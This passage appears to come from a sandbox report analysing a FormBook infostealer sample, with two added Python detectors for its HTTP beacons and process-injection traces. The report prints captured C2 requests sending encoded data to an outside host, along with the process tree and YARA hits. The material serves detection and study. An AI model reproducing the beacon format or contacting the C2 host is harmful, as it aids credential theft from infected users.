                                                                                    Data Ascii: Ubhdm=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhBAxgKFFaL45Y6sqBjC50jLAaYbYHLrjlVHk60e
                                                                                    Jan 8, 2025 15:02:35.059575081 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Wed, 08 Jan 2025 14:02:34 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    23 | 192.168.2.5 | 49999 | 217.196.55.202 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 8, 2025 15:02:37.037743092 CET | 1826 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.empowermedeco.com
                                                                                    Origin: http://www.empowermedeco.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 7a 66 57 5a 6e 4e 6e 31 33 44 6b 46 66 7a 44 2f 49 65 45 6e 42 33 32 7a 51 2f 57 4b 65 45 72 65 54 79 34 78 6b 73 63 6f 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 30 4f 5a 6e 37 68 75 35 4b 34 66 37 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 [TRUNCATED]
                                                                                    Data Ascii (decoded from the Data Raw bytes above; the report truncates the 1242-byte body): Ubhdm=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJzfWZnNn13DkFfzD/IeEnB32zQ/WKeEreTy4xkscoKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO0OZn7hu5K4f7/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803e [TRUNCATED]
                                                                                    Timestamp: Jan 8, 2025 15:02:37.636917114 CET | Bytes transferred: 1085 | Direction: IN | Data:
                                                                                    HTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Wed, 08 Jan 2025 14:02:37 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 50000 | Destination IP: 217.196.55.202 | Destination Port: 80 | PID: 3200 | Process: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Timestamp: Jan 8, 2025 15:02:39.566620111 CET | Bytes transferred: 518 | Direction: OUT | Data:
                                                                                    GET /fo8o/?Ubhdm=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&Dvh=YnI07v HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.empowermedeco.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Timestamp: Jan 8, 2025 15:02:40.141056061 CET | Bytes transferred: 1235 | Direction: IN | Data:
                                                                                    HTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Wed, 08 Jan 2025 14:02:40 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/?Ubhdm=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&Dvh=YnI07v
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
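
Added example (not part of the Joe Sandbox report and not the sandbox's own signature logic): a small Python matcher that parses the two requests above and scores the traits they share, so the same pattern can be tested against other captures. The two request strings are rebuilt from sessions 23 and 24 as printed here (the POST body is the decoded prefix of the Data Raw bytes); the control request, the individual rules, their labels and the threshold of 3 are assumptions of this example, not documented FormBook indicators.

```python
"""Heuristic matcher for the two FormBook-style HTTP beacons shown above.

Added example, not Joe Sandbox's detection logic. SESSION_23_POST and
SESSION_24_GET are reconstructed from the report's own session dumps (the
POST body is the decoded prefix of the Data Raw bytes; the report truncates
the rest). BENIGN_GET, the scoring rules, their labels and the threshold in
is_suspicious are this example's assumptions.
"""
import re
from urllib.parse import urlsplit

UA_IE8_WIN7 = (
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
    "Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"
)

# Session 23 from the report; body = decoded prefix of its Data Raw dump.
SESSION_23_POST = (
    "POST /fo8o/ HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Host: www.empowermedeco.com\r\n"
    "Origin: http://www.empowermedeco.com\r\n"
    "Cache-Control: no-cache\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 1242\r\n"
    "Referer: http://www.empowermedeco.com/fo8o/\r\n"
    f"User-Agent: {UA_IE8_WIN7}\r\n"
    "\r\n"
    "Ubhdm=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh"
)

# Session 24 from the report.
SESSION_24_GET = (
    "GET /fo8o/?Ubhdm=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4"
    "cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&Dvh=YnI07v HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en\r\n"
    "Host: www.empowermedeco.com\r\n"
    "Connection: close\r\n"
    f"User-Agent: {UA_IE8_WIN7}\r\n"
    "\r\n"
)

# Constructed control (not from the report): an ordinary browser page load.
BENIGN_GET = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.invalid\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/120.0\r\n"
    "Accept: text/html\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

LEGACY_UA_PREFIX = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1;"
SHORT_DIR = re.compile(r"^/[a-z0-9]{3,6}/$")        # e.g. /fo8o/
SHORT_KEY = re.compile(r"^[A-Za-z]{2,8}$")          # e.g. Ubhdm, Dvh
B64ISH = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")  # raw, un-escaped base64 alphabet


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def beacon_params(req: dict) -> list:
    """Key/value pairs from the POST body or the GET query string.

    No URL-decoding on purpose: the capture carries '+', '/' and '=' literally,
    and decoding '+' to a space would hide the base64 alphabet."""
    raw = req["body"] if req["method"] == "POST" else urlsplit(req["target"]).query
    pairs = []
    for chunk in raw.split("&"):
        if chunk:
            key, _, value = chunk.partition("=")
            pairs.append((key, value))
    return pairs


def formbook_http_score(req: dict) -> tuple:
    """Count the beacon traits visible in sessions 23/24; returns (score, reasons)."""
    h = req["headers"]
    host = h.get("host", "")
    path = urlsplit(req["target"]).path
    reasons = []
    if h.get("user-agent", "").startswith(LEGACY_UA_PREFIX):
        reasons.append("legacy IE8/Windows 7 User-Agent")
    if SHORT_DIR.match(path):
        reasons.append("short single-directory path with trailing slash")
    ref = urlsplit(h.get("referer", ""))
    if host and ref.netloc == host and ref.path == path:
        reasons.append("Referer points at the request's own URL")
    if req["method"] == "POST" and host and urlsplit(h.get("origin", "")).netloc == host:
        reasons.append("Origin equals Host on a form POST")
    params = beacon_params(req)
    if params and SHORT_KEY.match(params[0][0]) and B64ISH.match(params[0][1]):
        reasons.append(f"base64-like blob under short key {params[0][0]!r}")
    if h.get("connection", "").lower() == "close" and h.get("cache-control", "").lower() == "no-cache":
        reasons.append("Connection: close with Cache-Control: no-cache")
    return len(reasons), reasons


def is_suspicious(raw: str, threshold: int = 3) -> bool:
    """Threshold is an assumption: both captured beacons reach it, the control does not."""
    return formbook_http_score(parse_http_request(raw))[0] >= threshold


if __name__ == "__main__":
    for name, raw in (("session 23", SESSION_23_POST), ("session 24", SESSION_24_GET), ("control", BENIGN_GET)):
        score, why = formbook_http_score(parse_http_request(raw))
        print(f"{name}: score={score} {'SUSPICIOUS' if score >= 3 else 'ok'} {why}")
```

Both captured requests reach the threshold, the POST through all six traits and the GET through the User-Agent, the path shape and the un-escaped base64 blob alone; the control request scores 0. Note that the server answered both requests with a 301 to the https:// URL and Connection: close, so this section shows no response from the C2 beyond the hosting provider's generic redirect page.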


                                                                                    Target ID:0
                                                                                    Start time:08:58:56
                                                                                    Start date:08/01/2025
                                                                                    Path:C:\Users\user\Desktop\BP-50C26_20241220_082241.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"
                                                                                    Imagebase:0xc10000
                                                                                    File size:1'565'696 bytes
                                                                                    MD5 hash:33D01C02E1BB141330AA8BE95C21F1BF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:08:58:57
                                                                                    Start date:08/01/2025
                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"
                                                                                    Imagebase:0x510000
                                                                                    File size:46'504 bytes
                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:08:59:04
                                                                                    Start date:08/01/2025
                                                                                    Path:C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe"
                                                                                    Imagebase:0x930000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:4
                                                                                    Start time:08:59:06
                                                                                    Start date:08/01/2025
                                                                                    Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                    Imagebase:0xd0000
                                                                                    File size:22'016 bytes
                                                                                    MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Target ID:6
                                                                                    Start time:08:59:19
                                                                                    Start date:08/01/2025
                                                                                    Path:C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe"
                                                                                    Imagebase:0x930000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:7
                                                                                    Start time:08:59:31
                                                                                    Start date:08/01/2025
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                    Imagebase:0x7ff79f9e0000
                                                                                    File size:676'768 bytes
                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true
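
Added example (not part of the report): a Python triage of the process list above. It copies the Path, Commandline and YARA rule names of each Target ID into RECORDS and applies three checks a responder would run over endpoint telemetry: an image path that disagrees with the executable named in its own command line (Target ID 2, svchost.exe running under the sample's command line), an executable under Program Files whose vendor directory is a long random mixed-case string (Target IDs 3 and 6), and FormBook YARA hits inside a binary that lives under C:\Windows (Target IDs 2 and 4). The check names, the 24-character mixed-case threshold and the record layout are this example's assumptions.

```python
"""Triage of the process records listed above.

Added example, not Joe Sandbox logic. RECORDS copies the Path, Commandline
and YARA rule names from the Target ID blocks on this page and drops the
other fields. The three findings, their labels and the length/case
thresholds in looks_random_vendor_dir are this example's assumptions.
"""
from pathlib import PureWindowsPath

FORMBOOK_RULES = ["JoeSecurity_FormBook_1", "Windows_Trojan_Formbook_1112e116"]
DROPPED_EXE = (r"C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK"
               r"\gaJjobDqjDYWsfRWPZSKY.exe")

# Constructed from the Target ID blocks above (paths and command lines verbatim).
RECORDS = [
    {"target": 0, "path": r"C:\Users\user\Desktop\BP-50C26_20241220_082241.exe",
     "cmdline": r'"C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"', "yara": []},
    {"target": 2, "path": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"', "yara": FORMBOOK_RULES},
    {"target": 3, "path": DROPPED_EXE, "cmdline": f'"{DROPPED_EXE}"', "yara": FORMBOOK_RULES},
    {"target": 4, "path": r"C:\Windows\SysWOW64\netbtugc.exe",
     "cmdline": r'"C:\Windows\SysWOW64\netbtugc.exe"', "yara": FORMBOOK_RULES},
    {"target": 6, "path": DROPPED_EXE, "cmdline": f'"{DROPPED_EXE}"', "yara": FORMBOOK_RULES},
    {"target": 7, "path": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', "yara": []},
]


def cmdline_image(cmdline: str) -> str:
    """First token of a Windows command line, honouring a quoted image path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def image_cmdline_mismatch(rec: dict) -> bool:
    """The image on disk is not the executable the command line claims was
    launched: what a hollowed or replaced process looks like (Target ID 2).
    Case is folded because Windows paths are case-insensitive (Target ID 7)."""
    on_disk = PureWindowsPath(rec["path"]).name.lower()
    claimed = PureWindowsPath(cmdline_image(rec["cmdline"])).name.lower()
    return on_disk != claimed


def looks_random_vendor_dir(path: str, min_len: int = 24) -> bool:
    """Executable directly under Program Files\\<vendor> where <vendor> is a long
    run of mixed-case letters with no spaces or digits (Target IDs 3 and 6).
    The length threshold is an assumption of this example."""
    parts = PureWindowsPath(path).parts  # ('C:\\', 'Program Files (x86)', vendor, exe)
    if len(parts) < 4 or parts[1].lower() not in ("program files", "program files (x86)"):
        return False
    vendor = parts[2]
    return (len(vendor) >= min_len and vendor.isalpha()
            and vendor != vendor.lower() and vendor != vendor.upper())


def injected_system_binary(rec: dict) -> bool:
    """Malware YARA rules firing in the memory of a binary under C:\\Windows
    means the code was injected, not loaded from that image (Target IDs 2 and 4)."""
    parts = PureWindowsPath(rec["path"]).parts
    under_windows = len(parts) > 1 and parts[1].lower() == "windows"
    return under_windows and bool(rec["yara"])


def triage(records: list) -> dict:
    """Map each Target ID to the list of findings raised for it (possibly empty)."""
    findings = {}
    for rec in records:
        hits = []
        if image_cmdline_mismatch(rec):
            hits.append("image/command-line mismatch")
        if looks_random_vendor_dir(rec["path"]):
            hits.append("random vendor directory under Program Files")
        if injected_system_binary(rec):
            hits.append("malware YARA hits inside a Windows system binary")
        findings[rec["target"]] = hits
    return findings


if __name__ == "__main__":
    for target, hits in triage(RECORDS).items():
        print(f"Target ID {target}: {', '.join(hits) if hits else 'no finding'}")
```

The Firefox record shows why the basename comparison must fold case: the report prints firefox.exe on disk and Firefox.exe in the command line, which is not a mismatch. Target ID 0 produces no finding because these checks look for injection and persistence artifacts, not for the initial dropper itself.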


                                                                                      Execution Graph

                                                                                      Execution Coverage:2.7%
                                                                                      Dynamic/Decrypted Code Coverage:2%
                                                                                      Signature Coverage:3.1%
                                                                                      Total number of Nodes:1666
                                                                                      Total number of Limit Nodes:37
                                                                                      execution_graph: node/edge listing omitted (rendering residue of the interactive graph view; the node counts are given above). The node labels are code addresses in the 0xc1xxxx to 0xc8xxxx range, consistent with the sample image of Target ID 0 (imagebase 0xc10000), and carry the API calls made at each address: CreateWindowExW, ShowWindow, Shell_NotifyIconW, DestroyIcon, LoadStringW, GetForegroundWindow, ShellExecuteW, SetCurrentDirectoryW, GetModuleFileNameW, GetFullPathNameW, GetLongPathNameW, GetOpenFileNameW, LoadLibraryA, LoadLibraryExW, GetProcAddress, FreeLibrary, CreateStreamOnHGlobal, RtlAllocateHeap and RaiseException, together with CRT helpers such as _wcslen, __fread_nolock, __wsopen_s, _strftime, ___scrt_fastfail, ___std_exception_copy and _free.
96919->96921 96923 c3e586 96921->96923 96924 c3e579 96921->96924 96922 c3e549 96943 c427ec 26 API calls pre_c_initialization 96922->96943 96934 c48061 96923->96934 96944 c3f2d9 20 API calls _free 96924->96944 96928 c3e58f 96929 c3e5a2 96928->96929 96930 c3e595 96928->96930 96946 c3e5d4 LeaveCriticalSection __fread_nolock 96929->96946 96945 c3f2d9 20 API calls _free 96930->96945 96931 c3e554 __wsopen_s 96931->96886 96935 c4806d ___scrt_is_nonwritable_in_current_image 96934->96935 96947 c42f5e EnterCriticalSection 96935->96947 96937 c4807b 96948 c480fb 96937->96948 96941 c480ac __wsopen_s 96941->96928 96942->96922 96943->96931 96944->96931 96945->96931 96946->96931 96947->96937 96955 c4811e 96948->96955 96949 c48088 96961 c480b7 96949->96961 96950 c48177 96966 c44c7d 96950->96966 96955->96949 96955->96950 96964 c3918d EnterCriticalSection 96955->96964 96965 c391a1 LeaveCriticalSection 96955->96965 96956 c48189 96956->96949 96979 c43405 11 API calls 2 library calls 96956->96979 96958 c481a8 96980 c3918d EnterCriticalSection 96958->96980 96984 c42fa6 LeaveCriticalSection 96961->96984 96963 c480be 96963->96941 96964->96955 96965->96955 96967 c44c8a IsInExceptionSpec 96966->96967 96968 c44cca 96967->96968 96969 c44cb5 RtlAllocateHeap 96967->96969 96981 c34ead 7 API calls 2 library calls 96967->96981 96982 c3f2d9 20 API calls _free 96968->96982 96969->96967 96970 c44cc8 96969->96970 96973 c429c8 96970->96973 96974 c429d3 RtlFreeHeap 96973->96974 96978 c429fc _free 96973->96978 96975 c429e8 96974->96975 96974->96978 96983 c3f2d9 20 API calls _free 96975->96983 96977 c429ee GetLastError 96977->96978 96978->96956 96979->96958 96980->96949 96981->96967 96982->96970 96983->96977 96984->96963 96986 c2fddb 22 API calls 96985->96986 96987 c15734 96986->96987 96987->96896 96989 c142bc FindResourceExW 96988->96989 96993 c142d9 96988->96993 96990 c535ba LoadResource 96989->96990 96989->96993 96991 c535cf SizeofResource 96990->96991 96990->96993 96992 c535e3 LockResource 96991->96992 
